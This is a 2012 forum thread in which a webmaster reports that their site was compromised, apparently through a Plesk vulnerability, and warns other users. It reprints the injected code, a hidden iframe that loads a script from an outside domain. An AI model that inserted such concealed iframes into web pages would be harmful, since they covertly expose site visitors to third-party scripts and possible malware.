I got an email on Friday from my webhost that a site of mine had some dodgy code added by a thrid party, they removed the code and installed a backup from the previous evening they then updated passwords etc...
I check this morning and the code is back - the SOB is using a hidden DIV but also leaving their URL in there as well! I decided to call the moron from Pakistan and besides his obvious shock that he had been caught he also asked if I wanted the same doing for any of my own clients!
I called up my hosts and they say that there is a plesk vulnerability and a security update was issued last night, just a heads up if you use Plesk to make sure your hosting company is on the ball!
<iframe style="visibility: hidden; display: none; display: none;" src="http://websolutionspk.com/referer2.php?id={8A2E1F52-25BE-4959-8B36-5353479723B7}"></iframe>
Quote from: creative666 on February 13, 2012, 09:33:27 AM
he also asked if I wanted the same doing for any of my own clients!
Funny though :) Wonder how many core members just contacted him.
It turns out our friend from Pakistan was not the ring leader, his site was also screwed over and they were using his site to run their scripts :)
He says he was confused over the phone talking to me and thought I was asking for link building work! I was telling him in a not so polite way what he could do with his hidden DIVs, so no wonder he got confused ::)